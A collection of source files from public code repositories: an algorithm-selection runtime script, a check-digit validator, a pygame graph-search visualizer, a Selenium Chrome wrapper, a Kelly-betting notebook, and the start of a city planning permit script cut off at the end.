+{"seq_id":"22706309644","text":"import arff\nimport os\nimport numpy as np\nfrom argparse import ArgumentParser\n\n\nif __name__ == \"__main__\":\n    print(\"Ex6 Q1\\nSyed Mohsin Ali\\n\")\n    parser = ArgumentParser()\n    parser.add_argument(\"-a\", \"--algoruns\", dest=\"scenario\",\n                        default=\"SAT11-INDU/algorithm_runs.arff\", help=\"specify algorithm_runs.arff file\")\n    args, unknown = parser.parse_known_args()\n\n    np.set_printoptions(formatter={\"float\": lambda x: \"%0.0f\" % x})\n    scenarios = [\"SAT11-INDU\", \"SAT11-RAND\"]\n    set = 1\n    # scenario = scenarios[set]\n    scenario = args.scenario\n    print(\"DataSet:%s\\n\" % scenario)\n\n    ar = args.scenario\n    # print(ar, cv, fv)\n    results = arff.load(open(ar, \"rb\"))\n    data = results[\"data\"]\n\n    num_algos = 0\n    algos = list()\n    for i, d in enumerate(data):\n        # print(\"here:\", i)\n        if data[i][2] not in algos:\n            algos.append(data[i][2])\n        else:\n            break\n\n    num_algos = len(algos)\n    num_instances = len(data) // num_algos\n\n    runtime_matrix = np.zeros((num_instances, num_algos))\n\n    for i in range(num_instances):\n        for j in range(num_algos):\n            if data[i * num_algos + j][3] == 5000:\n                runtime_matrix[i][j] = data[i * num_algos + j][3] * 10\n            else:\n                runtime_matrix[i][j] = data[i * num_algos + j][3]\n\n    oracle_time = np.zeros(num_instances)\n    oracle_time = np.amin(runtime_matrix, axis=1)\n    ot = np.average(oracle_time)\n\n    seq_time = np.zeros(num_instances)\n    seq_time = np.amin(runtime_matrix, axis=1) * num_algos\n    np.clip(seq_time, 0, 50000, seq_time)\n    st = np.average(seq_time)\n\n    single_best = np.zeros(num_algos)\n    single_best = 
np.average(runtime_matrix, axis=0)\n sbt = np.amin(single_best)\n # print(single_best)\n\n print(\"Oracle:\", ot)\n print(\"SB:\", sbt)\n # print(\"Seq. Time:\", st)\n # np.savetxt(\"matrix.txt\", runtime_matrix, fmt='%.2f')\n\n","repo_name":"smohsinali/aad","sub_path":"ex6/aslib_state.py","file_name":"aslib_state.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38409257349","text":"def main():\n actNum = int(input(\"Enter number 5-digit integer number: \"))\n \n if (actNum >= 10000 and actNum <= 99999):\n checkDigit = actNum % 10\n accNum = actNum // 10\n num1 = (accNum // 1000)\n num2 = (accNum // 100) % 10\n num3 = (accNum // 10) % 10\n num4 = (accNum % 10)\n \n total = num1 + num2 + num3 + num4\n\n valid = (total % 7) == checkDigit\n if valid:\n print(\"Valid!\")\n else:\n print(\"Invalid\")\n\nmain()\n","repo_name":"kevanantha/campus-python","sub_path":"pythonuts.py","file_name":"pythonuts.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37198646993","text":"import pygame, sys\n\nfrom pygame.draw import line\nfrom Node import Node\nfrom Edge import Edge\nfrom fringe import PriorityQueue\nfrom TextBox import TextBox\n\n\nclass Graph:\n def __init__(self, surface, screen, radius, directed = False):\n self.surface = surface\n self.screen = screen\n self.radius = radius\n self.margin = radius * 2 - 5 #> Outside the node\n self.padding = radius - 5 #> Inside the node\n self.nodes = []\n self.edge = []\n self.edges = []\n self.directed = directed\n self.font = pygame.font.Font(\"RobotoCondensed-Regular.ttf\", 20)\n self.adding = False\n self.showHeuristic = False\n self.showCost = False\n self.node_sound = pygame.mixer.Sound(\"sound.wav\")\n self.node_sound.set_volume(0.1)\n self.edge_sound= pygame.mixer.Sound(\"mouse_click.wav\")\n self.edge_sound.set_volume(0.1)\n\n\n def addNode(self, point):\n\n for node in self.nodes:\n if (node.insideNode(point, self.margin)):\n return False \n\n self.nodes.append(Node(point, radius= self.radius))\n self.node_sound.play()\n self.adding = True\n return True\n\n\n def removeNode(self, point):\n for nodeA in self.nodes:\n if (nodeA.insideNode(point, self.padding)):\n for nodeB in self.nodes:\n nodeB.removeConnection(nodeA)\n nodeB.color = Node.default_color\n self.nodes.remove(nodeA)\n self.edge = []\n self.deleteEdge(nodeA)\n return\n\n\n def addEdge(self, point):\n if (self.adding):\n self.adding = False\n else:\n for node in self.nodes:\n if (node.insideNode(point, self.padding)):\n\n if (node in self.edge):\n self.edge = []\n node.color = Node.default_color\n else:\n self.edge.append(node)\n self.edge_sound.play()\n\n if len(self.edge) == 2:\n if (Edge(self.edge[0], self.edge[1]) not in self.edges):\n edge = Edge(self.edge[0], self.edge[1], self.directed,self.surface, self.screen)\n self.edges.append(edge)\n self.edge[0].addConnection(node, edge)\n if not(self.directed):\n self.edge[1].addConnection(self.edge[0], edge)\n \n self.edge[0].color = Node.default_color\n\n\n self.edge = []\n\n\n def deleteEdge(self, node):\n deleteIndex = []\n for index, edge in enumerate(self.edges):\n if node.center == edge.startingPoint or node.center == edge.endingPoint:\n deleteIndex.append(index)\n \n for i in deleteIndex[::-1]:\n self.edges.pop(i)\n\n\n def draw_nodes(self, point):\n\n for state,node in enumerate(self.nodes):\n\n if (node.type == \"G\"):\n 
node.state = \"G\"\n else:\n node.state = \"S\" + str(state)\n\n\n pygame.draw.circle(self.surface, (48, 48, 48), (node.center.x + 2, node.center.y + 2), node.radius) #> Shadow\n \n if (node in self.edge): #> Selected\n node.color = Node.selected_color\n \n pygame.draw.circle(self.surface, node.color, node.center, node.radius) #> Node fill\n \n node.draw_state(self.font, self.surface)\n\n if (self.showHeuristic):\n node.tb.render(self.surface, self.font)\n\n if (node.insideNode(point, self.padding)): #> Hovering over node\n # node.color = node.hovered_color\n pygame.draw.circle(self.surface, Node.hovered_color, node.center, node.radius, 4) #> Node fill\n else:\n pygame.draw.circle(self.surface, (0,0,0), node.center, node.radius, 3) #> Node border\n \n\n def draw_edges(self):\n for edge in self.edges:\n edge.draw(self.surface, edge.color, (0,255,0))\n if (self.showCost):\n edge.tb.render(self.surface, self.font)\n \n\n def addWeight(self, point):\n if (self.showHeuristic or self.showCost):\n for node in self.nodes:\n if(self.showHeuristic):\n if (node.tb.rect.collidepoint(point)):\n node.heuristic = node.tb.takeInput(self.surface, self.screen, self.font)\n return True\n \n if (self.showCost):\n for adj in node.adjacent:\n if(adj[1].tb.rect.collidepoint(point)):\n adj[1].weight = adj[1].tb.takeInput(self.surface, self.screen, self.font)\n return True\n\n\n def isEmpty(self):\n return True if len(self.edges) == 0 else False\n\n\n def reset(self):\n self.nodes = []\n self.edges = []\n self.edge = []\n self.reset_nodes()\n\n\n def printGraph(self):\n for node in self.nodes:\n print(node)\n\n\n def path_to_goal(self, current):\n cost = 0\n while(current.parent is not None):\n edge = current.getEdgeFromParent()\n cost += edge.weight\n edge.color = (76, 82, 245)\n current = current.parent\n return cost\n\n \n def start_goal_states(self, point):\n for node in self.nodes:\n if(node.insideNode(point, self.padding)):\n return node\n\n\n def input_depth_limit(self, point):\n prompt = \"Please type the maximum depth.\"\n prompt_surf = self.font.render(prompt, True, (0,0,0))\n prompt_rect = prompt_surf.get_rect()\n prompt_rect.center = self.surface.get_width() // 2, self.surface.get_height() // 2 - 20\n\n box = pygame.Rect(0, 0, prompt_rect.width + 30, prompt_rect.height + 50)\n box.center = (self.surface.get_width() // 2, self.surface.get_height() // 2)\n\n tb = TextBox(box.centerx, box.centery + 12, hight=16, border= False, active=(255,255,255), allowZero= True)\n\n pygame.draw.rect(self.surface, (255,255,255), box)\n pygame.draw.rect(self.surface, (0,0,0), box, width = 3)\n\n self.surface.blit(prompt_surf, prompt_rect)\n\n tb.render(self.surface, self.font)\n \n\n pygame.draw.line(self.surface, (0,0,0), (box.left + 50, box.bottom - 15), (box.right - 50, box.bottom - 15), 3)\n \n return (tb.takeInput(self.surface, self.screen, self.font))\n \n\n def runAlgorithm(self, panel, grid_surf, algorithm, speed, max_depth = -1):\n loop = True\n start_state = None\n goal_states = []\n message = \"\"\n cost = 0\n\n message = \"Please select ONE START state\"\n while(loop):\n mouse = pygame.mouse.get_pos()\n\n #$ Event Loop\n for event in pygame.event.get(): \n #$ QUIT event\n if (event.type == pygame.QUIT):\n loop = False\n pygame.quit()\n sys.exit()\n if(event.type == pygame.MOUSEBUTTONDOWN):\n self.edge_sound.play()\n if(panel.mouseOnPanel(mouse)):\n\n if (panel.showH_btn.detect_click()):\n self.showHeuristic = panel.showH_btn.detect_toggle()\n \n elif (panel.speed_btn.detect_click()):\n speed = 
panel.speed_control()\n\n elif (panel.showC_btn.detect_click()):\n self.showCost = panel.showC_btn.detect_toggle()\n\n elif (panel.play_btn.detect_click()):\n if (start_state is not None and len(goal_states) > 0):\n panel.play_btn.detect_toggle()\n self.reset_nodes()\n \n self.updateScreen(panel)\n\n if (algorithm == \"BFS\"):\n cost = self.BFS(start_state, goal_states, speed)\n\n elif (algorithm == \"UCS\"):\n cost = self.UCS(start_state, goal_states, speed)\n\n elif (algorithm == \"DFS\"):\n cost = self.DFS(start_state, goal_states, speed)\n\n elif (algorithm == \"ITD\"):\n cost = self.ITD(start_state, goal_states, speed, max_depth)\n\n elif (algorithm == \"DLS\"):\n cost = self.DLS(start_state, goal_states, speed, max_depth)\n\n elif (algorithm == \"GRY\"):\n cost = self.GRDY(start_state, goal_states, speed)\n\n elif (algorithm == \"AST\"):\n cost = self.ASRT(start_state, goal_states, speed)\n\n message2 = f\"Start state {start_state} nl Goal stats {list(map(lambda x: x.state, goal_states))}\"\n \n if(max_depth != -1):\n message2 += f\" nl Max Depth {max_depth}\"\n\n message =\"Algorithm has finished execution nl \" + message2 + f\" nl Total Cost to goal {cost}. nl Press `Play` to run the algorithm again or nl Press stop search to return back to drawing.\"\n\n # elif (panel.speed_btn.detect_click()):\n # speed = panel.speed_control()\n\n elif(panel.stop_btn.detect_click()):\n panel.play_btn.toggled = False\n loop = False\n self.reset_nodes()\n start_state = None\n goal_states = []\n return True\n\n else: #$ If click on canvas\n node = self.start_goal_states(mouse)\n if (node is not None):\n if (start_state is None):\n message = \"Please select at least one GOAL state. nl Then press PLAY SEARCH to begin.\"\n node.color = Node.start_state_color\n node.type = \"S\"\n start_state = node\n elif(start_state is not node):\n node.color = Node.goal_state_color\n node.type = \"G\"\n goal_states.append(node)\n \n panel.fill()\n self.surface.fill((255, 255, 255))\n self.surface.blit(grid_surf, (0,0))\n \n\n panel.btnDetect_hover(mouse)\n panel.draw_btns()\n panel.displayMessage(message)\n\n self.draw_edges()\n self.draw_nodes(mouse)\n \n self.updateScreen(panel)\n\n\n def updateScreen(self, panel):\n self.screen.blit(self.surface, (0,0))\n if (panel != 0):\n self.screen.blit(panel.panel_surf, (panel.cordX, panel.cordY))\n pygame.display.update()\n\n\n def BFS(self, start_state, goal_states, speed = 750):\n print(\"BFS Search RUN\")\n\n speed_event = pygame.USEREVENT + 1\n pygame.time.set_timer(speed_event, speed)\n\n root = start_state\n fringe = [root]\n visited = []\n goal = goal_states\n current = None\n state_fringe = []\n\n while(len(fringe) > 0):\n for event in pygame.event.get():\n if event.type == speed_event:\n state_fringe = list(map(lambda x: x.state, fringe))\n\n print(state_fringe) \n current = fringe[0]\n if (current.parent is not None):\n current.getEdgeFromParent().color = (117, 116, 115)\n visited.append(current)\n fringe = fringe[1:]\n\n current.color = Node.current_node_color\n if current in goal:\n current.color = Node.goal_state_color\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return self.path_to_goal(current)\n \n for adj in current.adjacent:\n if adj[0] not in visited and adj[0] not in fringe:\n adj[0].color = Node.in_fringe_color\n if (adj[0] not in fringe):\n adj[0].parent = current\n fringe.append(adj[0]) \n\n self.draw_edges()\n self.draw_nodes((0,0))\n self.screen.blit(self.surface, (0,0))\n pygame.display.update()\n\n current.color = 
Node.visited_color\n \n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return False\n\n\n def DFS(self, start_state, goal_states, speed = 750):\n print(\"DFS Search RUN\")\n pygame.event.clear()\n speed_event = pygame.USEREVENT + 1\n pygame.time.set_timer(speed_event, speed)\n\n root = start_state\n fringe = []\n fringe.append(root)\n visited = []\n\n while (len(fringe) > 0):\n\n # print(pygame.event.get() )\n for event in pygame.event.get():\n if event.type == speed_event:\n state_fringe = list(map(lambda x: x.state, fringe))\n print(state_fringe) \n\n current = fringe.pop()\n\n\n if (current.parent is not None):\n current.getEdgeFromParent().color = (117, 116, 115)\n\n visited.append(current)\n\n current.color = Node.current_node_color\n\n if current in goal_states:\n current.color = Node.goal_state_color\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return self.path_to_goal(current)\n\n for adj in current.adjacent:\n if adj[0] not in visited:\n adj[0].color = Node.in_fringe_color\n\n if (adj[0] not in fringe):\n adj[0].parent = current\n fringe.append(adj[0])\n\n self.draw_edges()\n self.draw_nodes((0, 0))\n self.screen.blit(self.surface, (0, 0))\n pygame.display.update()\n\n current.color = Node.visited_color\n\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return False\n\n\n def UCS(self, start_state, goal_states, speed = 750):\n print(\"UCS Search RUN\")\n speed_event = pygame.USEREVENT + 1\n pygame.time.set_timer(speed_event, speed)\n\n root = start_state\n fringe = PriorityQueue()\n fringe.add(root, 0)\n visited = []\n\n while not fringe.empty():\n for event in pygame.event.get():\n if event.type == speed_event:\n fringe.display_queue()\n \n current = fringe.pop() \n visited.append(current)\n\n if (current.parent is not None):\n current.getEdgeFromParent().color = (117, 116, 115)\n\n\n if current in goal_states:\n current.color = Node.goal_state_color\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return self.path_to_goal(current)\n\n for adj in current.adjacent:\n betterSol = current.total_cost + adj[1].weight < adj[0].total_cost\n if (adj[0] not in visited) and not(fringe.inside(adj[0])):\n\n if (adj[0].parent is None):\n adj[0].parent = current\n adj[0].total_cost = adj[0].parent.total_cost + adj[1].weight \n fringe.add(adj[0], adj[0].total_cost)\n visited.append(adj[0])\n adj[0].color = Node.in_fringe_color\n\n elif fringe.inside(adj[0]) and betterSol:\n adj[0].parent = current\n adj[0].total_cost = adj[0].parent.total_cost + adj[1].weight\n fringe.replace((adj[0], adj[0].total_cost))\n fringe.add(adj[0], adj[0].total_cost)\n adj[0].color = Node.in_fringe_color\n\n \n\n current.color = Node.current_node_color\n\n self.draw_edges()\n self.draw_nodes((0, 0))\n self.screen.blit(self.surface, (0, 0))\n pygame.display.update()\n\n current.color = Node.visited_color\n\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return False\n\n\n def GRDY(self, start_state, goal_states, speed = 750):\n print(\"Greedy Search RUN\")\n speed_event = pygame.USEREVENT + 1\n pygame.time.set_timer(speed_event, speed)\n\n root = start_state\n fringe = PriorityQueue()\n fringe.add(root, root.heuristic) # the counter is used to differentiate between elements with the same weight\n visited = []\n\n while not fringe.empty():\n for event in pygame.event.get():\n if event.type == speed_event:\n print(\">\") \n fringe.display_queue()\n\n current = fringe.pop()\n visited.append(current)\n\n if (current.parent is not None):\n 
current.getEdgeFromParent().color = (117, 116, 115)\n\n current.color = Node.current_node_color\n\n if current in goal_states:\n current.color = Node.goal_state_color\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return self.path_to_goal(current)\n\n for adj in current.adjacent:\n\n if (adj[0] not in visited) and not(fringe.inside(adj[0])):\n adj[0].parent = current\n print(\">>\") \n fringe.display_queue()\n fringe.add(adj[0], adj[0].heuristic)\n print(\">>>\") \n fringe.display_queue()\n adj[0].color = Node.in_fringe_color\n\n\n self.draw_edges()\n self.draw_nodes((0, 0))\n self.screen.blit(self.surface, (0, 0))\n pygame.display.update()\n\n current.color = Node.visited_color\n \n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return False\n\n\n def ASRT(self, start_state, goal_states, speed = 750):\n print(\"A* Search RUN\")\n speed_event = pygame.USEREVENT + 1\n pygame.time.set_timer(speed_event, speed)\n\n root = start_state\n root.update_f_cost()\n counter = 0\n fringe = PriorityQueue()\n fringe.add(root, root.f_cost) # the counter is used to differentiate between elements with the same weight\n visited = []\n\n while not fringe.empty():\n for event in pygame.event.get():\n if event.type == speed_event:\n fringe.display_queue(True)\n\n current = fringe.pop()\n visited.append(current)\n\n if (current.parent is not None):\n current.getEdgeFromParent().color = (117, 116, 115)\n\n if current in goal_states:\n current.color = Node.goal_state_color\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return self.path_to_goal(current)\n\n for adj in current.adjacent:\n betterSol = current.total_cost + adj[1].weight + adj[0].heuristic < adj[0].f_cost\n\n if (adj[0] not in visited) and not(fringe.inside(adj[0])):\n\n if (adj[0].parent is None):\n adj[0].parent = current\n adj[0].total_cost = adj[0].parent.total_cost + adj[1].weight\n adj[0].update_f_cost() \n fringe.add(adj[0], adj[0].f_cost)\n visited.append(adj[0])\n adj[0].color = Node.in_fringe_color\n\n elif fringe.inside(adj[0]) and betterSol:\n adj[0].parent = current\n adj[0].total_cost = adj[0].parent.total_cost + adj[1].weight\n adj[0].update_f_cost()\n \n fringe.add(adj[0], adj[0].f_cost)\n adj[0].color = Node.in_fringe_color\n\n\n current.color = Node.current_node_color\n\n self.draw_edges()\n self.draw_nodes((0, 0))\n self.screen.blit(self.surface, (0, 0))\n pygame.display.update()\n\n current.color = Node.visited_color\n \n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return False\n\n\n def ITD(self, start_state, goal_states, speed = 750, cycles = 1):\n print(\"Iterative Deepening Search RUN\") \n\n speed_event = pygame.USEREVENT + 1\n pygame.time.set_timer(speed_event, speed)\n\n max_depth = 1\n cycles += 1\n while(cycles > 0):\n root = start_state\n fringe = []\n fringe.append(root)\n visited = []\n\n current_depth = 0\n self.reset_nodes()\n\n while (len(fringe) > 0):\n\n for event in pygame.event.get():\n\n if event.type == speed_event:\n state_fringe = list(map(lambda x: x.state, fringe))\n\n print(state_fringe)\n\n current = fringe.pop()\n\n if (current.parent is not None):\n current.getEdgeFromParent().color = (117, 116, 115)\n\n visited.append(current)\n\n current.color = Node.current_node_color\n\n if current in goal_states:\n current.color = Node.goal_state_color\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return self.path_to_goal(current)\n\n current_depth = current.get_hight() + 1\n\n if (current_depth < max_depth):\n\n for adj in 
current.adjacent:\n if adj[0] not in visited:\n adj[0].color = Node.in_fringe_color\n\n if (adj[0] not in fringe):\n adj[0].parent = current\n fringe.append(adj[0])\n\n\n self.draw_edges()\n self.draw_nodes((0, 0))\n self.screen.blit(self.surface, (0, 0))\n pygame.display.update()\n\n current.color = Node.visited_color\n \n cycles -= 1\n max_depth += 1\n \n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return False\n\n\n def DLS(self, start_state, goal_states, speed = 750, cycles = 1):\n print(\"Depth Limited Search RUN\") \n\n speed_event = pygame.USEREVENT + 1\n pygame.time.set_timer(speed_event, speed)\n\n cycles += 1\n max_depth = cycles\n print(max_depth)\n root = start_state\n fringe = []\n fringe.append(root)\n visited = []\n\n current_depth = 0\n self.reset_nodes()\n\n while (len(fringe) > 0):\n\n for event in pygame.event.get():\n\n if event.type == speed_event:\n state_fringe = list(map(lambda x: x.state, fringe))\n\n print(state_fringe) \n\n current = fringe.pop()\n\n if (current.parent is not None):\n current.getEdgeFromParent().color = (117, 116, 115)\n\n visited.append(current)\n\n current.color = Node.current_node_color\n\n if current in goal_states:\n current.color = Node.goal_state_color\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return self.path_to_goal(current)\n\n current_depth = current.get_hight() + 1\n # print(current, current_depth)\n\n if (current_depth < max_depth):\n\n for adj in current.adjacent:\n if adj[0] not in visited:\n adj[0].color = Node.in_fringe_color\n\n if (adj[0] not in fringe):\n adj[0].parent = current\n fringe.append(adj[0])\n\n\n self.draw_edges()\n self.draw_nodes((0, 0))\n self.screen.blit(self.surface, (0, 0))\n pygame.display.update()\n\n current.color = Node.visited_color\n\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return False\n\n\n def reset_nodes(self):\n for node in self.nodes:\n node.color = Node.default_color\n node.total_cost = 0\n node.parent = None\n node.type = \"\"\n\n for edge in self.edges:\n edge.color = (0,0,0)","repo_name":"KAYounes/AIProject","sub_path":"Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":27678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40798407748","text":"from typing import Any\n\nimport subprocess\nimport time\n\nimport pyperclip\n\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nfrom .config import *\n\n\n__all__ = [\n \"ChromeDriver\",\n]\n\n\ndef load_driver() -> Chrome:\n subprocess.Popen(r'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe '\n r'--remote-debugging-port=9222 --user-data-dir=\"C:\\chrometemp\"')\n\n options = Options()\n options.add_experimental_option(\"debuggerAddress\", \"127.0.0.1:9222\")\n\n driver = Chrome(\n options=options,\n service=Service(ChromeDriverManager().install()),\n )\n\n return driver\n\n\nclass ChromeDriver:\n def __init__(\n self,\n time_to_wait: float = default_wait,\n time_to_sleep: float = default_sleep,\n ) -> None:\n self.time_to_wait = time_to_wait\n self.time_to_sleep = time_to_sleep\n\n self.driver = load_driver()\n\n def close_driver(\n self,\n ) -> None:\n self.driver.close()\n 
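# close() closes the current browser window; quit() shuts down the whole WebDriver session\n 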
self.driver.quit()\n\n def wait(\n self,\n ) -> None:\n self.driver.implicitly_wait(self.time_to_wait)\n time.sleep(self.time_to_sleep)\n\n def go(\n self,\n url: str,\n ) -> None:\n self.driver.get(url)\n\n self.wait()\n\n def current_url(\n self,\n ) -> str:\n return str(self.driver.current_url)\n\n def get_element(\n self,\n find_element_by: str,\n element_value: str,\n ) -> Any:\n element = self.driver.find_element(\n by=getattr(By, find_element_by),\n value=element_value,\n )\n\n return element\n\n def get_elements(\n self,\n find_elements_by: str,\n elements_value: str,\n ) -> Any:\n elements = self.driver.find_elements(\n by=getattr(By, find_elements_by),\n value=elements_value,\n )\n\n return elements\n\n def does_element_exist(\n self,\n find_element_by: str,\n element_value: str,\n ) -> bool:\n try:\n self.driver.find_element(\n by=getattr(By, find_element_by),\n value=element_value,\n )\n\n except NoSuchElementException:\n return False\n\n return True\n\n def click(\n self,\n find_element_by: str,\n element_value: str,\n ) -> None:\n element = self.get_element(\n find_element_by=find_element_by,\n element_value=element_value,\n )\n\n element.click()\n\n self.wait()\n\n def input(\n self,\n find_element_by: str,\n element_value: str,\n input_value: str,\n ) -> None:\n element = self.get_element(\n find_element_by=find_element_by,\n element_value=element_value,\n )\n\n element.clear()\n\n element.click()\n pyperclip.copy(input_value)\n element.send_keys(Keys.CONTROL, \"v\")\n\n self.wait()\n\n def get_value(\n self,\n find_element_by: str,\n element_value: str,\n element_attribute: str,\n ) -> Any:\n element = self.get_element(\n find_element_by=find_element_by,\n element_value=element_value,\n )\n\n return element.get_attribute(element_attribute)\n\n def get_text(\n self,\n find_element_by: str,\n element_value: str,\n ) -> Any:\n element = self.get_element(\n find_element_by=find_element_by,\n element_value=element_value,\n )\n\n return element.text\n","repo_name":"yupeeee/YupTools","sub_path":"src/yuptools/web/chrome/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"11544316046","text":"# %%\nimport datetime as dt\nimport time\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport plotly.io as pio\nimport seaborn as sns\nimport statsmodels as sm\n\npd.options.plotting.backend = \"plotly\"\npio.templates.default = 'plotly_dark'\npio.renderers.default = 'notebook_connected'\n\nsns.set_style('darkgrid')\n# sns.style.use('seaborn-deep')\nplt.rcParams['figure.dpi'] = 150\n\n\n# %%\ndef kelly(p, w=1, l=1):\n return p / l - (1 - p) / w\n\n\nkelly(0.7)\n\n# %% [markdown]\n# ## Probability matching is suboptimal\n#\n# Below we examine the case of an individual playing a game with the following rules:\n# - *n* iterations\n# - each iteration is a flip of a biased coin with $p = 0.8$\n# - in each iteration, an individual bets \\\\$1 on either H or T. 
They lose their bet if they are wrong, win their bet if they are right.\n# Obviously the dominant strategy is to bet \\$1 on H every time if $p > 0.5$, else bet \\$1 on $T$ every time.\n# \"Probability matching\" is the observed bias in which people tend to bet H with a frequency approximately equal to the probability of H, i.e. betting heads 80% of the time.\n# Consider a situation where the coin has known bias $p >= 0.5$ and we bet heads with frequency $f$. Elementary arithmetic shows that the EV per iteration is $1 - 2(f+p-2fp)$.\n# In the \"optimal\" case $f=1$, we recover $EV = 2p-1$. Probability matching yields $(2p-1)^2$.\n\n# %%\n# Analysis\nps = np.linspace(0.5, 1, 100)\ndf = pd.DataFrame({\n \"optimal\": 2 * ps - 1,\n \"matching\": (2 * ps - 1)**2\n},\n index=ps)\ndf.plot()\n\n# %% [markdown]\n# For a given true probability, you can see that the EV is linear in $f$, e.g. if $p = 0.8$\n# you end up with $EV = 1.2f - 0.6$.\n# This is verified via simulation (below).\n\n# %%\n\n\ndef flips(p=0.5, n=10_000):\n # codes H/T as +/- 1\n a = np.random.binomial(1, p, (n, ))\n return np.where(a == 0, -1, a)\n\n\n# %%\n\ntrue_prob = 0.8\ns_prob = 1\ny = flips(true_prob)\ns = flips(s_prob)\n\n\ndef eval_strategy(s_prob, true_prob=0.8, n=10_000):\n y = flips(true_prob, n)\n s = flips(s_prob, n)\n return (y * s).cumsum()\n\n\n# %%\n\nn = 100_000\nps = np.arange(0.5, 1.0, 0.05)\nres = []\nfor s_prob in ps:\n res.append(eval_strategy(s_prob, 0.8, n)[-1] / n)\n\npd.DataFrame({\"analytical\": 1.2 * ps - 0.6, \"sim\": res}, index=ps).plot()\n# %%\n\n# plot out wealth growth\nps = np.arange(0.5, 1.0, 0.05)\nres = {}\nfor s_prob in ps:\n res[f\"{s_prob:.2f}\"] = eval_strategy(s_prob, 0.8, 1000)\n\npd.DataFrame(res).plot()\n# %%\n\n\ndef kelly_fraction(p, W):\n return p - (1 - p) / W\n\n\nWs = np.linspace(0.5, 10, 100)\nfs = kelly_fraction(0.75, Ws)\n\nfig, ax = plt.subplots()\nax.plot(Ws, fs, label='kelly')\nax.set_ylim(0.4, 1)\nax.axhline(0.75,\n xmin=0,\n xmax=9,\n color='k',\n linestyle='--',\n label='prob matching')\nax.set_xlabel('W')\nax.set_ylabel('f*')\nax.legend()\nplt.show()\n\n# %%\n\nkelly_fraction(0.75, 5)\n# 0.7\n# %%\n\n\ndef kelly_simul(true_prob=0.8, n=100_000):\n y = flips(true_prob, n)\n\n\n# %%\n\ny = flips(true_prob, n)\nprint(f\"{y}\")\n# y is an array([1, 1, 1, ..., -1, 1, 1])\n","repo_name":"eo1989/mkt_stats_notes","sub_path":"probabilitymatching_kellybetting.py","file_name":"probabilitymatching_kellybetting.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71421631786","text":"# IMPORT\nimport pandas as pd\nimport os\nimport datetime\nimport numpy as np\n\nnp.warnings.filterwarnings('ignore', category=np.VisibleDeprecationWarning) \n\npd.options.mode.chained_assignment = None\n\n\n# ADMIN FUNCTIONS\n\ndef get_holidays(holiday_path=r'data\\raw_data\\City_Holidays.xlsx'):\n return set([\n pd.Timestamp(h) \n for h in pd.read_excel(holiday_path)['date'].unique()\n ])\nholidays = get_holidays()\n\n# PLANNER FUNCTIONS\n\nplanner_initials = {\n 'ABC': 'Alan Carreon',\n 'AS': 'Ana Spinola',\n 'AMS': 'Andrew Smith',\n 'CG': 'Chip Griffin',\n 'EB': 'Ethan T Bindernagel',\n 'GDK': 'Greg Kapovich',\n 'GV': 'Gerardo Victoria',\n 'HEC': 'Haley E Croffoot',\n 'HH': 'Haley Hubbard',\n 'JG': 'Jessica J Gonzalez',\n 'JCav': 'Jeanine Cavalli',\n 'KN': 'Ken Nodder',\n 'OA': 'Ozzy Arce',\n 'SKG': 'Simar Gill',\n 'SP': 'Sukhamrit S Purewal',\n 'TC': 'Trishia Caguiat'\n}\nplanner_names = {v:k for k,v 
in planner_initials.items()}\nplanner_names['Haley Hubbard'] = 'HEC'\nplanner_initials['HH'] = 'Haley E Croffoot'\n\n\n# ENTITLEMENTS\n\n#Complete_Closed = ['Approved - Closed', 'Closed', 'Not Approved - Closed']\n#Planner_Closed = ['Close Out', 'Approved', 'Not Approved']\nEnt = {\n 'Zoning Amendment': 'Amend',\n 'Use Permit Minor': 'MUP',\n 'Design Review': 'DR',\n 'Design Review Oversized Home': 'DR',\n 'Design Review Other': 'DR',\n 'Design Review Commercial': 'DR',\n 'General Plan Amendment': 'Amend',\n 'Design Review Antenna': 'DR',\n 'Design Review Residential': 'DR',\n 'Use Permit Conditional': 'CUP',\n 'Use Permit Administrative': 'AUP',\n 'ZCL':'ZCL',\n 'Variance': 'Vari',\n 'Rezoning': 'ReZone',\n 'Tree Dripline Encroachment': 'Tree',\n 'Tree Removal Permit': 'Tree',\n '': 'Other',\n 'Other': 'Other',\n 'Tentative Map Major Subdivision': 'Maj Sub',\n 'Drip Line Encroachment': 'Other',\n 'Tentative Map Minor Subdivision': 'Min Sub',\n 'Tentative Map Condo Conversion': 'Conv',\n 'Hillside Performance Standards': 'Other'}\nEnt_names = {v:k for k,v in Ent.items()}\nEnt_names['Other'] = 'Other'\n\n\n# PERMIT TYPES\n\nBUILD = 